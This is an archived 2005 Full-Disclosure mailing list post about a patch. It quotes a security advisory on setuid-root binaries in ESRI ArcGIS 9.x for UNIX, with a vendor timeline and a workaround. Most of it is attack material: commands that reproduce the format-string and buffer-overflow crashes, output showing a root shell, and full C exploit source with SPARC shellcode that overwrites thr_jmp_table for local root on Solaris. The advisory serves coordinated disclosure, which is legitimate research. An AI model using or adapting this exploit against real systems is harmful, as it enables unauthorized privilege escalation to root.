OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Re: [Full-disclosure] DMA[2005-0425a] - 'ESRI ArcGIS 9.x multiple local vulnerabilities'

From: KF (lists) (kf_listsdigitalmunition.com)
Date: Tue May 24 2005 - 11:50:26 CDT


Esri has posted a version 8.3 patch to their web site:

http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1020

This patch should address the problems that I outlined in version 9.x
-KF

KF (lists) wrote:

>
>------------------------------------------------------------------------
>
>DMA[2005-0425a] - 'ESRI ArcGIS 9.x multiple local vulnerabilities'
>Author: Kevin Finisterre
>Vendor: http://www.esri.com/, http://www.esri.com/software/arcgis/arcinfo/index.html
>Product: 'ArcInfo Workstation for UNIX'
>References:
>http://www.digitalmunition.com/DMA[2005-0425a].txt
>
>Description:
>On any given day, more than 1,000,000 people around the world use ESRI's GIS to improve the
>way their organizations conduct business.
>
>ESRI software is used by more than 300,000 organizations worldwide including most U.S. federal
>agencies and national mapping agencies, 45 of the top 50 petroleum companies, all 50 U.S. state
>health departments, most forestry companies, and many others in dozens of industries.
>
>ESRI software is the standard in state and local government and is used by more than 24,000
>state and local governments including Paris, France; Los Angeles, California, USA; Beijing, China;
>and Kuwait City, Kuwait.
>
>ESRI ArcGIS is an integrated collection of GIS software products for building a complete GIS.
>ArcGIS enables users to deploy GIS functionality wherever it is needed in desktops, servers, or
>custom applications; over the Web; or in the field.
>
>Several local overflows and format string conditions have been found in the Unix versions of ESRI
>ArcGIS products. ESRI Staff has promptly responded to and fixed the issues mentioned below. Patches
>for ArcGIS 9.x will be available at the time this advisory is published.
>
>(http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015)
>
>Our testing was performed against ARCInfo Workstation 9 on two of ESRI's supported UNIX platforms.
>We have currently only tested IRIX 6.5 and Solaris 10(beta). All UNIX ArcInfo installs are believed
>to be impacted by these vulnerabilities. It is currently unknown how older versions of ArcGIS are
>affected by these bugs. ESRI has stated that fixes for 8.x are forthcomming so I can only assume
>exploitation is similar for this particlar version.
>
>The vulnerable binaries can be found in <install path>/bin. The files are both setuid and setgid so
>they should be easily found during a routine setuid scan using the unix find utility. I was not able to
>exploit ALL of the binaries I found however it is likely that more vulns could be discovered.
>
>10 setuid root binaries are provided with the install of ARCInfo
>-bash-2.05b$ pwd
>/export/home/arcgis/arcexe9x/bin
>
>SunOS:
>-bash-2.05b$ ls -al `find . -perm -4000 `
>-rwsr-sr-x 1 root nuucp 56772 Mar 5 2004 ./abservice
>-rwsr-sr-x 1 root nuucp 4601408 Mar 5 2004 ./arcrqmgr
>-rwsr-sr-x 1 root nuucp 2311796 Mar 5 2004 ./asbuild
>-rwsr-sr-x 1 root nuucp 2817120 Mar 5 2004 ./asmaster
>-rwsr-sr-x 1 root nuucp 7988480 Mar 5 2004 ./asrecovery
>-rwsr-sr-x 1 root nuucp 8240340 Mar 5 2004 ./asuser
>-rwsr-sr-x 1 root nuucp 2765020 Mar 5 2004 ./asutility
>-rwsr-sr-x 1 root nuucp 75904 Mar 5 2004 ./lockmgr
>-rwsr-sr-x 1 root nuucp 5652228 Mar 5 2004 ./se
>-rwsr-sr-x 1 root nuucp 81332 Mar 5 2004 ./wservice
>
>SGI:
>station0 515# ls -al `find . -perm -4000`
>-rwsr-sr-x 1 root lp 44648 Mar 9 2004 ./abservice
>-rwsr-sr-x 1 root lp 5920592 Mar 9 2004 ./arcrqmgr
>-rwsr-sr-x 1 root lp 2508552 Mar 9 2004 ./asbuild
>-rwsr-sr-x 1 root lp 3263552 Mar 9 2004 ./asmaster
>-rwsr-sr-x 1 root lp 9758516 Mar 9 2004 ./asrecovery
>-rwsr-sr-x 1 root lp 10065284 Mar 9 2004 ./asuser
>-rwsr-sr-x 1 root lp 3229812 Mar 9 2004 ./asutility
>-rwsr-sr-x 1 root lp 83260 Mar 9 2004 ./lockmgr
>-rwsr-sr-x 1 root lp 6926980 Mar 9 2004 ./se
>-rwsr-sr-x 1 root lp 83180 Mar 9 2004 ./wservice
>
>For some reason the binaries are setgid (9). On our SunOS and IRIX boxes
>this group corresponed respectively with nuucp and lp.
>
>Some of the vulnerabilities will require a properly working license and license manager
>-bash-2.05b# export LM_LICENSE_FILE=/export/home/arcgis/arcexe9x/sysgen/license.dat
>-bash-2.05b# ps -ef | grep lmgr | grep -v grep
> root 1294 1 0 18:14:44 pts/3 0:00 ./lmgrd -c ./license.dat
>
>during exploitation you may see license requests mixed in with the applciation responses.
>
>18:27:29 (ARCGIS) IN: "ArcStormEnable" kfims0
>18:27:29 (ARCGIS) OUT: "ArcStormEnable" kfims0
>
>A cursory audit of the above listed applications revealed the following
>flaws.
>
>Both lockmgr and wservice are vulnerable to a format string attack.
>
>-bash-2.05b$ export
>ARCHOME=AAAABBBB%x.%x.%x.%x
>
>-bash-2.05b$ ./wservice
>Can not find or access
>AAAABBBB7ffffc00.2a078.9e39c.241 - wservice not run!
>
>-bash-2.05b# export ARCHOME=%x.%x.%x.%x
>-bash-2.05b# ./lockmgr
>Can not find or access 7ffffc00.2a15c.9e39c.36 - lockmgr not run!
>
>asmaster is vulnerable to a buffer overflow attack
>
>-bash-2.05b# ./asmaster `perl -e 'print "A" x 2285'` b
>FATAL ERROR
>Segment Violation
>
>-bash-2.05b# ./asuser `perl -e 'print "A" x 694'` a a a
>FATAL ERROR
>Segment Violation
>
>asutility has multiple overflows
>
>-bash-2.05b# ./asutility DBDEF REMOVE `perl -e 'print "A" x 701'`
>FATAL ERROR
>Segment Violation
>
>-bash-2.05b# ./asutility RMDB `perl -e 'print "A" x 1865'`
>FATAL ERROR
>Segment Violation
>
>-bash-2.05b# ./asutility CHECKDBIDS AVAILABLE `perl -e 'print "A" x
>804'`
>FATAL ERROR
>Segment Violation
>
>please note that asutility has several other overflows. Listing them all is a
>bit redundant.
>
>se is subject to a buffer overflow
>
>-bash-2.05b# ../bin/se `perl -e 'print "A" x 1278'`
>FATAL ERROR
>Segment Violation
>
>asrecovery is subject to a buffer overflow
>
>-bash-2.05b# ./asrecovery `perl -e 'print "A" x 1987'` a a a
>FATAL ERROR
>Segment Violation
>
>In order to show that these issues do indeed pose a security risk we have created PoC for the
>format string conditions in wservice and lockmgr. This exploit was tested on the solaris platform
>however exploitation on other platforms should be trivial.
>
>-bash-2.05b$ ./ex_ARC_wservice
>Can not find or access
>ZAAAA>4BBBB>67ffffc000002a0780009e39c00000615ff330c5cff330ba00000001000000001ff3033e8ff3ed86cffd
>fffffff3ea9d8ffffff7fffbff4c0ff3be2bcffbff4c0ff3be2100000000000000000000000000000000000000007ff330c5
>80000000100000007ff3ea9d8ff3ea1140000000010000000ff3ecc30ff3ea108ff3ea1a800c1004000000602ff3ea108000
>00000ff330c580000060200c100c0ffbff618ff3cba180000000000000000000000000000000000000000000000000000000
>00001b8cc0001273c000100000001b8ccff3ecbd000000002ffbff7f8ffbff7b400000000ff3ec4f800019de700000000000
>100940000000000000000ff3ecbd00002a48000000020ff3b00006ffffffd000000000000000000000000000000000000001
>0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
>0000900000000000000000000000000013db40000000041f7286533a121f0404919490000000041f7082825e36eb00000200
>0000000a075667300000000000000000000000000000000000001179fff3ecc30ff33072800000016ff330a3c00000000000
>00000ffffffffffffffffffffffffffffffffffffffffff3b000000000003ff3ea10800010034ffffffffffbff7acff3b000
>043616e206e6f742066696e64206f7220616363657373205a000000000000000000000000000000000000000000000000000
>0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
>0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
>0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
>0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
>0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
>0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
>0000000004141414100000000000000000000000000000000000000000000000000000000000000000000000000000000000
>0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
>0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
>0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004
>2424242
>
>
>
> ? !
>
> !v#
>
> ݢ`y;# )!
> !n#
> ܢch;## ### ?"
>? ; п - wservice not run!
># id
>uid=0(root) gid=0(root)
>
>Workaround:
>chmod -s the above mentioned setuid files or apply the patches supplyed by ESRI which can be located
>at http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015
>
>This is basic timeline associated with this bug.
>
>01/18/2005 assigned case #409658 Jeremy W takex ownership of the technical support incident
>01/18/2005 Jeremy W logged this vulnerability as defect number CQ00261045
>01/26/2005 Johnh exploited the a bug on solaris
>--/--/---- Multiple communications involving the issues at hand over a several month period
>04/11/2005 Bug patches provided to KF for testing
>04/27/2005 Fixes have been tested and verified
>04/30/2005 Public disclosure.
>
>As mentioned above ESRI was very prompt in addressing and fixing the issues at hand. Since the
>discovery of these bugs ESRI has attempted to proactively prevent future exploits from occuring.
>
>-KF
>
>
>
>
>------------------------------------------------------------------------
>
>/** ESRI 9.x Arcgis local root format string exploit
> **
> ** Copyright Kevin Finisterre and John H.
> ** Bug found by Kevin Finisterre <kfdigitalmunition.com>
> ** Exploit by John H. <johnhdigitalmunition.com>
> **
> ** We overwrite the thr_jmp_table
> ** Tested on solaris 10
> **/
>
>
>#include <dlfcn.h>
>#include <fcntl.h>
>#include <link.h>
>#include <procfs.h>
>#include <stdio.h>
>#include <stdlib.h>
>#include <strings.h>
>#include <unistd.h>
>#include <sys/systeminfo.h>
>
>#define VULPROG "/export/home/arcgis/arcexe9x/bin/wservice"
>#define NOP "\xa2\x1c\x40\x11"
>int iType;
>
>
>struct
>{
> unsigned long retloc;
> unsigned long retaddr;
> char *type;
>}targets[] =
>{
>
> /* bash-2.05b$ nm /usr/lib/ld.so.1 | grep thr_jmp_table
> 0003a234 d thr_jmp_table
> */
> {0xff3ea234,0xffbffba8,"SunOS 5.10sun 4u sparc SUNW"},
> {0x41424344,0x41424344,"DEBUG"},
> },v;
>
>
>
>
>
>
>
>//shellcode taken from netric
>char shellcode[] =
>"55"
>
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
>
> // setreuid(0,0);
>
> "\x90\x1d\x80\x16" // xor %l6, %l6, %o0
> "\x92\x1d\x80\x16" // xor %l6, %l6, %o1
> "\x82\x10\x20\xca" // mov 0xca, %g1
> "\x91\xd0\x20\x08" // ta 8
>
> "\x90\x1d\x80\x16" // xor %l6, %l6, %o0
> "\x92\x1d\x80\x16" // xor %l6, %l6, %o1
> "\x82\x18\x40\x01" // xor %g1, %g1, %g1
> "\x82\x10\x20\xcb" // mov 0x2e, %g1
> "\x91\xd0\x20\x08" // ta 8 [setregid(0,0)]
>
> "\x21\x0b\xd9\x19" // sethi %hi(0x2f646400), %l0
> "\xa0\x14\x21\x76" // or %l0, 0x176, %l0
> "\x23\x0b\xdd\x1d" // sethi %hi(0x2f747400), %l1
> "\xa2\x14\x60\x79" // or %l1, 0x79, %l1
> "\xe0\x3b\xbf\xf8" // std %l0, [ %sp - 0x8 ]
> "\x90\x23\xa0\x08" // sub %sp, 8, %o0
> "\x92\x1b\x80\x0e" // xor %sp, %sp, %o1
> "\x82\x10\x20\x05" // mov 0x05, %g1
> "\x91\xd0\x20\x08" // ta 8 [open("/dev/tty",RD_ONLY)]
>
> "\x90\x10\x20\x02" // mov 0x02, %o0
> "\x82\x10\x20\x29" // mov 0x29, %g1
> "\x91\xd0\x20\x08" // ta 8 [dup(2)]
>
> "\x21\x0b\xd8\x9a" // sethi %hi(0x2f626800), %l0
> "\xa0\x14\x21\x6e" // or %l0, 0x16e, %l0
> "\x23\x0b\xcb\xdc" // sethi %hi(0x2f2f7000), %l1
> "\xa2\x14\x63\x68" // or %l1, 0x368, %l1
> "\xe0\x3b\xbf\xf0" // std %l0, [ %sp - 0x10 ]
> "\xc0\x23\xbf\xf8" // clr [ %sp - 0x8 ]
> "\x90\x23\xa0\x10" // sub %sp, 0x10, %o0
> "\xc0\x23\xbf\xec" // clr [ %sp - 0x14 ]
> "\xd0\x23\xbf\xe8" // st %o0, [ %sp - 0x18 ]
> "\x92\x23\xa0\x18" // sub %sp, 0x18, %o1
> "\x94\x22\x80\x0a" // sub %o2, %o2, %o2
> "\x82\x18\x40\x01" // xor %g1, %g1, %g1
> "\x82\x10\x20\x3b" // mov 0x3b, %g1
> "\x91\xd0\x20\x08" // ta 8 [execve("/bin/sh","/bin/sh",NULL)]
>
> "\x82\x10\x20\x01" // mov 0x01, %g1
> "\x91\xd0\x20\x08" // ta 8 [exit(?)]
>
> "\x10\xbf\xff\xdf" // b shellcode
> "\x90\x1d\x80\x16"; // or %o1, %o1, %o1
>
>
>
>
>
>
>
>
>/* Big endian */
>/* sparc */
>char *putLong (char* ptr, long value)
>{
> *ptr++ = (char) (value >> 24) & 0xff;
> *ptr++ = (char) (value >> 16) & 0xff;
> *ptr++ = (char) (value >> 8) & 0xff;
> *ptr++ = (char) (value >> 0) & 0xff;
>
> return ptr;
>}
>
>/* main */
>int main(int argc, char **argv)
>{
>
> unsigned long retaddr;
> unsigned long retloc;
> int offset = 23;
> int dump_fmt=129;
> int al = 1;
> int i=0;
> int x=0;
> int c;
> unsigned long hi,lo;
> static unsigned long shift0,shift1;
> char buf[9000];
> char *args[24];
> char *env[6];
> char *ptr;
> char padding[64];
> char padding1[64];
> char buf2[9000];
>
> if (argc < 3) {
> usage (argv[0]);
> return -1;
> }
>
> while((c = getopt(argc, argv, "h:t:")) != EOF) {
> switch(c) {
> case 'h':
> usage (argv[0]);
> return 0;
> case 't':
> iType = atoi (optarg);
> break;
> default:
> usage (argv[0]);
> return 0;
> }
> }
>
>
>
> if (argc < 2) { usage(argv[0]); exit(1); }
>
> if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
> {
> usage(argv[0]);
> printf("[-] Invalid type.\n");
> return 0;
>}
>
>
>
>
>
>
>
> env[0] = shellcode;
> env[1] = buf2;
> env[2] = NULL;
>
> args[0] = VULPROG;
> args[1] = NULL;
>
>
>
>
> retloc = targets[iType].retloc;
> retaddr = targets[iType].retaddr;
>
>
>
> hi = (retaddr >> 16) & 0xffff;
> lo = (retaddr >> 0) & 0xffff;
>
> shift0 = hi - offset - (dump_fmt * 8 + 16 + al);
> shift1 = (0x10000 + lo) - hi;
>
> memset(buf,0x00,sizeof(buf));
> memset(buf2,0x00,sizeof(buf2));
> ptr = buf;
>
> for (i = 0; i < al; i++) {
> *ptr++ = 0x41;
> }
>
> ptr = putLong (ptr, 0x41414141);
> ptr = putLong (ptr, retloc);
> ptr = putLong (ptr, 0x42424242);
> ptr = putLong (ptr, retloc+2);
>
> for (i = 0 ; i < dump_fmt; i ++) {
> memcpy(ptr, "%.8x", 4);
> ptr = ptr + 4;
> }
>
>
>
>
>
> strcat(ptr,"%.");
> sprintf(ptr+strlen(ptr),"%u",shift0);
> strcat(ptr,"lx%hn");
>
> strcat(ptr,"%.");
> sprintf(ptr+strlen(ptr),"%u",shift1);
> strcat(ptr,"lx%hn");
>
> strcat(buf2,"ARCHOME=");
> memcpy(buf2+strlen(buf2),buf,strlen(buf));
>
>
>
> execve (args[0], args, env);
> perror ("execve");
> return 0;
>}
>
>int usage(char *p)
>{
> int i;
> printf( "Arcgis local root format string exploit\r\n");
> printf( "Usage: %s <-t target>\n",p);
> for(i=0;i<sizeof(targets)/sizeof(v);i++)
> {
> printf("%d\t%s\n", i, targets[i].type);
> }
> return 0;
>}
>
>
>
>------------------------------------------------------------------------
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/